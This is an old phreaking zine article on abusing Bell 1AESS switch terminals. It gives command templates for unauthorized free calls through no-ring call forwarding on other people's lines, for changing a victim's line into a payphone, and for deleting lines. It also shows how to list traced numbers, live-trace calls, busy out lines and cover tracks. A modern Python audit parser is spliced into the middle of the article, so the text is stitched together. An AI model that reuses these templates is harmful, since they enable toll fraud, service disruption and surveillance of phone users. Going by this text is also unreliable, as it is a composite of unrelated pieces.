(Second of two articles written for CoTNo #006 [Communications of The New Order])
The Tao of 1AESS..................................Dead Kat & Disorder
=========
-=-
-= The Tao of 1AESS =-
-=-=-=-=-=-=-=-=
-= DeadKat&Disorder =-
-=-
-= Special thanks to Gatsby and Mark Tabas =-
Introduction
-=-=-=-=-=-=
The Bell System's first trial of electronic switching took place in Morris,
Illinois, in 1960. The Morris trial culminated a 6-year development and
proved the viability of the stored-program control concept. The first
application of electronic local switching in the Bell System occurred in May
1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
The 1ESS switching system was designed for use in areas where large numbers
of lines and lines with heavy traffic (primarily business customers) are
served. The system has generally been used in areas serving between 10,000
and 65,000 lines and has been the primary replacement system for urban
step-by-step and panel systems. The ease and flexibility of adding new
services made 1ESS switching equipment a natural replacement vehicle in
city applications where the demand for new, sophisticated business and
residence services is high.
In 1976, the first electronic toll switching system to operate a digital
time-division switching network under stored-program control, the 4ESS
system, was placed in service. It used a new control, the 1A processor,
for the first time to gain a call carrying capacity in excess of 550,000
busy-hour calls. The 1A processor was also designed for local switching
application. It doubled the call-carrying capacity of the 1ESS switching
system and was introduced in 1976 in the first 1AESS switch. The network
capacity of 1ESS switching equipment was also doubled to allow the 1AESS
switch to serve 130,000 lines.
In addition to local telephone service, the 1AESS switches offer a variety
of special services. Custom Local Area Switching Services (CLASS) are
available, as well as Custom Calling Services. Business customers may select
offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications
Service, or electronic tandem switching.
Although more modern switches like 5ESS and DMS 200 have been developed, it
is estimated that some 50 percent of all switches are still 1AESS.
Commands
-=-=-=-=
The 1AESS uses a command line interface for all commands. The commands are
divided into three fields: action, identification, and data. The fields
are always separated by a colon. Every command is terminated by either a
period for verification commands or a 'ballbat' (!) for change commands.
Control-d is used to execute the command instead of a return. The
underscore is used as a backspace. Commands are always typed in 'all caps'.
The action field is the first field of the command and is ended by a colon.
The identification field is ended by the second colon. The identification
field has one or two subfields which are separated by a semicolon. Semicolons
are not used elsewhere in the command. The data field consists of keyword
units and is the remaining portion of the command.
Basic Machine Commands
-=-=-=-=-=-=-=-=-=-=-=
These commands provide useful information from the system. The WHO-RV-
command will tell you what CO it is and what version of the OS is installed.
If your output is scrolling off the screen press space to end scrolling.
The V-STOP- command will clear the buffer.
WHO-RV-. System information.
SPACE Stops output from scrolling.
V-STOP-. Free buffer of remaining LENS/INFO.
Channel Commands
-=-=-=-=-=-=-=-=
Channel commands are used to redirect input and output. If a switch won't
respond to a command, use the OP:CHAN command to check the current channel.
If your channel is not responding, use the MON:CHAN command to switch output
and control to your terminal (the remote). You can check the status of the
RC with the RCCENSUS command.
OP:CHAN:MON! Shows all channels which are being monitored.
MON:CHAN SC1;CHAN LOC! Redirect output to remote screen.
STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen.
(This command needs to be done after you
are finished to help cover your tracks)
OP:RCCENSUS! To see recent change status.
Tracing Commands
-=-=-=-=-=-=-=-=
CI-LIST- will give you a list of all numbers which are being traced
externally. It will not show you lines which are being traced
internally, i.e. numbers inside one of the prefixes controlled
by the switch you are on.
CI-LIST-. Traced line list.
Check Features on Line
-=-=-=-=-=-=-=-=-=-=-=
The VF command is used to check the current settings on a line.
The DN XXXXXXX specifies the phone number of the line you wish to check.
Replace XXXXXXX with the seven digit phone number of the line you are
checking.
VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line.
VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features
Call Features CWT- Call Waiting
CFB- Call Forward Busy - Busy=VM
CFV- Call Forwarding Variable
CFD- Call Forward Don't answer
TWC- Three Way Calling
TTC- Touch Tone
RCY- Ring Cycle
SC1- Speed Calling 1
SC2- Speed Calling 2
UNA- No Long Distance
PXX- Block all LD service (guess)
MWI- Message Waiting Indicator
CHD- centrex(unremarkable)
CPU- centrex(unremarkable)
CLI- Calling Line Identification (CID)
ACB- Automatic Call Back Feature (?)
BLN- Special Toll Billing
FRE- Free Calling
The standard output of a command appears below. The 'DN 348 2141' specifies
the number you are checking. The calling features will be listed on the
second line by their three letter acronyms. This line has call waiting
(CWT), a trace (TRC), and touch tone dialing (TTC).
Example of 1A output:
M 53 TR75 2 DN 348 2141 00000003
CWT TRC TTC
Searching For Free Lines
-=-=-=-=-=-=-=-=-=-=-=-=
The VFY command can be used to check if a line is in use. The output will
list the LEN (Line Equipment Number) for the line and its call features in
octal. If the LEN is all zeros, then that number has not been assigned.
Replace XXXXXXX with the number you wish to check. You must prefix the
phone number with 30. You can also check for unused LENs using the VFY
command. Use the space bar to stop scrolling and the V-STOP command to
cancel when looking up free LENs.
VFY-DN-30XXXXXXX. Search for free lines.
VFY-LEN-4100000000. List all free LENs.
VFY-TNN-XXXXXXXX. To get information on trunk.
The output for the VFY-DN command will appear like the one below. Notice
that this number has been assigned a LEN so it is in use.
M 06 TR01 796 9146
0 0 0 0
LEN 01 025 000
001 000 000 000 000 000 4
000 000 000 000 000 000 000 000
0 0 0 0
0 0 0 0 0
Searching for a Particular Feature on a Line (like trace)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
All line information is stored in the switch for its coverage area. The
switch is like a huge database in this sense. You can do global searches
on the switch for any feature. One especially interesting feature to search
for is traced numbers. Traced numbers listed this way are INTERNALLY
traced as opposed to globally traced numbers shown with the CI-LIST- command.
Global and internal trace lists are always very different. And remember,
be a good Samaritan and call the person being traced and let them know! ;-)
VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area with
trace on it (takes a sec).
You can exmatch for any LASS feature by replacing the keyword TRACE with any
call feature like call forwarding (CFB) and speed calling (SC1).
To See What Numbers Are on a Speed Calling List
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Another nice use for the VFY command is to see what is on a line's speed
calling list. Replace XXXXXXX with the target phone number. One devious
use is to look at the CO's speed call list to find other internal telco
numbers.
VFY-LIST-09XXXXXXX020000
09=mask 02=single list (one digit speed calling)
20=double list (two digit speed calling)
28= " "
36= " "
44= " "
To Build a Line
-=-=-=-=-=-=-=-
The recent change command (RC) is used to create and modify lines. Because
RC commands are usually very long and complex, they are typed on multiple
lines to simplify them. Each subfield of the data section of the command is
typed on a separate line ended by a backslash (\) followed by pressing ctrl-d.
To create a line, you specify LINE in the identification field. Before
a line can be created, you must first locate an unused number by using the
VFY-DN command explained above. Once a free number has been found, you
use the VFY-LEN to find an available LEN. To build a new line, follow
these steps:
First, find a spare LEN (VFY-LEN-4100000000.). Next, find a free number. Now
type in the RC command using the following lines as a template:
RC:LINE:\ (create a line)
ORD 1\ (execute the command immediately)
TN XXXXXXX\ (telephone number)
LEN XXXXXXXX\ (len found from above)
LCC 1FR\ (line class code 1fr)
CFV\ (call forward)
XXX 288\ (type XXX, space, then the three digit PIC)
(LD carrier PICs: 222 - MCI, 288 - AT&T, 333 - Sprint, etc.)
! (BEWM, don't forget the ctrl-d!!)
(Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE
has taken effect)
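The field and terminator syntax from the Commands section, together with the multi-line RC form above (one data subfield per line, each ended by a backslash, then the bare terminator), is enough to reconstruct every command in a captured maintenance-terminal transcript and pick out the recent-change ones that alter line data. The parser below is an added example, not code from the article; the transcript is constructed, and splitting the dash-form commands (WHO-RV-., VFY-DN-...) on their first two dashes is an assumption drawn from the listed examples.

```python
TERMINATORS = {".": "verify", "!": "change"}  # per the article's syntax rules


def join_continuations(lines):
    """Join a multi-line RC command: lines ending in '\\' each carry one data
    subfield; the last line is the bare terminator."""
    parts = [ln.strip().rstrip("\\").strip() for ln in lines]
    head, *rest = parts
    if rest and rest[-1] in TERMINATORS:
        return head + ",".join(rest[:-1]) + rest[-1]
    return head + ",".join(rest)


def parse_command(text):
    """Split one complete command into action, identification subfields
    (';'-separated) and data keyword units (','-separated); None if the
    '.' or '!' terminator is missing."""
    text = text.strip()
    if not text or text[-1] not in TERMINATORS:
        return None
    kind, body = TERMINATORS[text[-1]], text[:-1]
    # Dash-form commands (WHO-RV-., VFY-DN-...) are split on their first two
    # dashes; that is an assumption from the listed examples, not article text.
    sep = ":" if ":" in body else "-"
    action, ident, data = (body.split(sep, 2) + ["", ""])[:3]
    return {
        "action": action.strip(),
        "ident": [s.strip() for s in ident.split(";") if s.strip()],
        "data": [s.strip() for s in data.split(",") if s.strip()],
        "kind": kind,
    }


def audit_session(lines):
    """Reconstruct each command in a session transcript and return the RC
    (recent change) commands, the ones that create, modify or remove lines,
    as (reconstructed text, parsed fields) pairs."""
    flagged, pending = [], []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        pending.append(line)
        if line.endswith("\\"):
            continue  # data subfield continues on the next line
        cmd = join_continuations(pending) if len(pending) > 1 else line
        pending = []
        parsed = parse_command(cmd)
        if parsed and parsed["action"] == "RC" and parsed["kind"] == "change":
            flagged.append((cmd, parsed))
    return flagged


# Constructed sample transcript; the numbers are placeholders, not real lines.
SESSION = [
    "WHO-RV-.",
    "VF:DNSVY:FEATRS,DN 5551234,1,PIC!",
    "RC:LINE;CHG:\\", "ORD 1\\", "TN 5551234\\", "CFV\\", "!",
    "VFY-DN-305551234.",
]
```

Running `audit_session(SESSION)` returns only the reconstructed RC:LINE;CHG command; the verification commands and the VF:DNSVY query pass through unflagged.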
Creating Call Forwarding Numbers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The call forwarding feature is the most important feature for hackers. By
creating a line or modifying an existing line with call forwarding, you can
then use it to make free phone calls. You set the line to call forward/
no ring and then give it the call forwarded number. This will allow you
to call the modified line and be instantly forwarded to your pre-chosen
destination.
First create a line using RC:LINE:, then modify the line using the following
commands as a template.
RC:CFV:\ (add call forwarding to a line.. begin: )
ORD 1\ (execute the command immediately)
BASE XXXXXXX\ (base number you are changing)
TO XXXXXXX\ (local - XXXXXXX : ld - XXXXXXXXXX )
PFX\ (set prefix to 1 if ld)
! (BEWM)
To Change Call Forward Number
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
It is safer to modify an existing call forward than to create a new line
solely for this purpose. You can use the VFY command and EXMATCH for CFB to
find lines with call forwarding. Before you can change the call forwarding
'TO' number you must delete the old one. Remove call forward number using
CFV:OUT with the template below.
RC:CFV;OUT:\ (remove call forward number...begin: )
ORD 1\ (execute command immediately)
BASE XXXXXXX\ (number to remove it from)
! (Yeeee-Hahhhahah)
Make Call Forward Not Ring
-=-=-=-=-=-=-=-=-=-=-=-=-=
The only drawback to call forwarding off someone's line is that if it rings they
might answer. To get around this, you add the call-forward no-ring option
(ICFRR) using the following as a template.
RC:LINE;CHG:\ (recent change line to be specified)
ORD 1\ (execute command immediately)
TN XXXXXXX\ (number you wanna fuck with)
ICFRR\ (this takes the ring off)
! (Go!)
Adding a feature to a line
-=-=-=-=-=-=-=-=-=-=-=-=-=
The RC:LINE;CHG: can also be used to add any other call feature. Use the
same template but change the feature.
RC:LINE;CHG:\ (this is used for changing features)
ORD 1\ (order number)
TN XXXXXXX\ (telephone number you are fucking with)
TWC\ (replace this with any feature you wish)
! (Fire!)
Removing a Feature
-=-=-=-=-=-=-=-=-=
Use the NO delimiter to remove a feature from a line.
RC:LINE;CHG:\ (change a feature)
ORD 1\ (effective immediately)
TN XXXXXXX\ (telephone number)
CFV NO\ (feature followed by NO)
! (Boo-Ya!)
Change Phone number into payphone
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
You've read about it in The Hacker Crackdown, now you too can be 31337 and
change Gail Thackery's phone into a payphone. In fact you can change the
line class code (LCC) to anything you want. To display the LCC of a line
use the following and replace the XXXXXXX with the line you wish to view.
VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code)
DTF = Payphone
1FR = Flat Rate
1MR = Measured Rate
1PC = One Pay Phone
CDF = DTF Coin
PBX = Private Branch Exchange
CFD = Coinless(ANI7) Charge-a-call
INW = InWATS (800!@#)
OWT = OutWATS
PBM = O HO/MO MSG REG (NO ANI)
PMB = LTG = 1 HO/MO (Regular ANI6)
(ani6 and ani7 - only good for DMS)
To change the line into a payphone use the RC:LINE;CHG command and modify
the LCC like the example below.
RC:LINE;CHG:\ (this is used for changing features)
ORD 1\ (order number)
TN XXXXXXX\ (telephone number you are fucking with)
LCC DTF\ (line class code you are changing to)
! (Make it so.)
*(You may have to remove some LASS features when doing this)*
To Kill a Line and Remove It Permanently
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
If you need to delete a line you have created (or haven't) use the following
syntax.
RC:LINE;OUT:\ (remove line)
ORD 1\ (effective immediately)
TN XXXXXXX\ (on this number)
! (GO!)
Monitoring Phone Calls
-=-=-=-=-=-=-=-=-=-=-=
There are powerful utilities to monitor calls and affect phone lines
available on a 1A. The T-DN- commands allow you to check the current
status of a line and make it busy or idle. If a line happens to be active
you can use the NET-LINE- command to trace the call and find the numbers
for both calling parties.
T-DN-RD XXXXXXX. See if call in progress.
output: =1 line busy
=0 line idle
T-DN-MB XXXXXXX. Make line busy.
T-DN-MI XXXXXXX. Make line idle.
NET-LINE-XXXXXXX0000. To do a live trace on a phone number through the
switch.
NET-TNN-XXXXXX Same as above for a trunk trace.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Appendix 1 - Common output messages seen on 1A switches
-=-=-=-=-=
** ALARM **
AR01 Office alarm
AR02 Alarm retired or transferred
AR03 Fuse blown
AR04 Unknown alarm scan point activated
AR05 Commercial power failure
AR06 Switchroom alarm via alarm grid
AR07 Power plant alarm
AR08 Alarm circuit battery loss
AR09 AMA bus fuse blown
AR10 Alarm configuration has been changed (retired,inhibited)
AR11 Power converter trouble
AR13 Carrier group alarm
AR15 Hourly report on building and power alarms
** AUTOMATIC TRUNK TEST **
AT01 Results of trunk test
** CARRIER GROUP **
CG01 Carrier group in alarm
CG03 Reason for above
** COIN PHONE **
CN02 List of pay phones with coin disposal problems
CN03 Possible Trouble
CN04 Phone taken out of restored service because of possible coin fraud
** COPY **
COPY Data copied from one address to another
** CALL TRACE **
CT01 Manually requested trace line to line, information follows
CT02 Manually requested trace line to trunk, information follows
CT03 Intraoffice call placed to a number with CLID
CT04 Interoffice call placed to a number with CLID
CT05 Call placed to number on the CI list
CT06 Contents of the CI list
CT07 ACD related trace
CT08 ACD related trace
CT09 ACD related trace
** DIGITAL CARRIER TRUNK **
DCT COUNTS Count of T carrier errors
** MEMORY DIAGNOSTICS **
DGN Memory failure in cs/ps diagnostic program
** DIGITAL CARRIER "FRAME" ERRORS **
FM01 DCT alarm activated or retired
FM02 Possible failure of entire bank not just frame
FM03 Error rate of specified digroup
FM04 Digroup out of frame more than indicated
FM05 Operation or release of the loop terminal relay
FM06 Result of digroup circuit diagnostics
FM07 Carrier group alarm status of specific group
FM08 Carrier group alarm count for digroup
FM09 Hourly report of carrier group alarms
FM10 Public switched digital capacity failure
FM11 PUC counts of carrier group errors
** MAINTENANCE **
MA02 Status requested, print out of MACII scratch pad
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system
MA05 Maintenance interrupt count for last hour
MA06 Scanners,network and signal distributors in trouble
MA07 Successful switch of duplicated unit (program store etc.)
MA08 Excessive error rate of named unit
MA09 Power should not be removed from named unit
MA10 OK to remove paper
MA11 Power manually removed from unit
MA12 Power restored to unit
MA13 Indicates central control active
MA15 Hourly report of # of times interrupt recovery program acted
MA17 Centrex data link power removed
MA21 Reports action taken on MAC-REX command
MA23 4 minute report, emergency action phase triggers are inhibited
** MEMORY **
MN02 List of circuits in trouble in memory
** NETWORK TROUBLE **
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble Trunk to Line
NT03 Network path trouble Line to Line
NT04 Network path trouble Trunk to Trunk
NT06 Hourly report of network frames made busy
NT10 Network path failed to restore
** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS Call store status
OP:DUSTATUS Data unit status
OP:ERAPDATA Error analysis database output
OP:INHINT Hourly report of inhibited devices
OP:LIBSTAT List of active library programs
OP:OOSUNITS Units out of service
OP:PSSTATUS Program store status
** PLANT MEASUREMENTS **
PM01 Daily report
PM02 Monthly report
PM03 Response to a request for a specific section of report
PM04 Daily summary of IC/IEC irregularities
** REPORT **
REPT:ADS FUNCTION Reports that a ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
REPT:ADS PROCEDURAL ERROR You fucked up
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL System programs that are off or on
REPT:RC CENSUS Hourly report on recent changes
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
** RECENT CHANGE **
RC18 RC message response
** REMOVE **
RMV Removed from service
** RESTORE **
RST Restored to service status
** RINGING AND TONE PLANT **
RT04 Status of monitors
** SOFTWARE AUDIT **
SA01 Call store memory audit results
SA03 Call store memory audit results
** SIGNAL IRREGULARITY **
SIG IRR Blue box detection
SIG IRR INHIBITED Detector off
SIG IRR TRAF Half hour report of traffic data
** TRAFFIC CONDITION **
TC15 Reports overall traffic condition
TL02 Reason test position test was denied
TL03 Same as above
** TRUNK NETWORK **
TN01 Trunk diagnostic found trouble
TN02 Dial tone delay alarm failure
TN04 Trunk diag request from test panel
TN05 Trunk test procedural report or denials
TN06 Trunk state change
TN07 Response to a trunk type and status request
TN08 Failed incoming or outgoing call
TN09 Network relay failures
TN10 Response to TRK-LIST input, usually a request from test position
TN11 Hourly, status of trunk undergoing tests
TN16 Daily summary of precut trunk groups
** TRAFFIC OVERLOAD CONDITION **
TOC01 Serious traffic condition
TOC02 Reports status of less serious overload conditions
** TRANSLATION ** (shows class of service, calling features etc.)
TR01 Translation information, response to VFY-DN
TR03 Translation information, response to VFY-LEN
TR75 Translation information, response to VF:DNSVY
** **
TW02 Dump of octal contents of memory
Trace Output Appearance (COT - Customer Oriented Trace)
A 03 CT04 22 03 02 05 11 26 359 705 8500 <-- NUMBER CALLED
CPN 212 382 8923 <-- WHO CALLED
01/14/95 22:03:02 <-- TIME/DATE
#236 <-- JOB NUMBER
Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
-=-=-=-=-=
RMV::NPC 69!
UTL::QRY.CMAP 136!
UTL::QRY.SCON to 135! (as far out as to 12003!)
UTL::QRY.SCON 13615/01!
UTL::QRY.ALMS!
UTL::QRY,WHO!
UTL::QRY,ALL!
UTL::QRY,FPKG!
UTL::QRY,UNIT1,FTMI1, EQL
GRTH::UNIT1! (FT100) <-- comment written by command
GRTH::UNI1,FTMI1, EQL(L,R) (2,2) <-- Example
UTL::QRY.!
RMV::LINK 3!
DGN::LINK 3!
RST::LINK 3!
UTL::QRY.TPS!
RST::TAPE! (This and the next two commands were
UTL::BMTR.FROM DISK.TO TAPE! ALWAYS found together, and are pretty
RMV::TAPE! obvious)
SDIS::FROM 11204/03.TO 11204/04!
UTL::QRY.SCON.CH.TO 11204!
UTL::QRY.CMAP.TO 11204/03!
UTL::QRY,CMAP 01117!
SCON::RATE 96.FROM 11204/03.TO 11204/4!
LOGIN::USER DAX\
UTL::EQD,NPCS!
ADD::LINK 2,NPCAD E!
UTL::LOC,ETSI 101!
|_|____________Bay (These show physical locations
|____________Unit of trunks)
UTL::LOC,NPC 01117!
output - 1-01-38
|__|__|_________Bay
|__|_________Unit
|_________38(1/8) inches
Appendix 3 - Suggested reading
-=-=-=-=-=
Acronyms 1988 (Phrack #20, file 11)
Central Office Operations by Agent Steal (LoDTJ #4, file 4)
ESS & 1A Switching Systems by Ninja Master
The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
Operator Services Position System by Bandito (Phun #5, file 8)
Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2)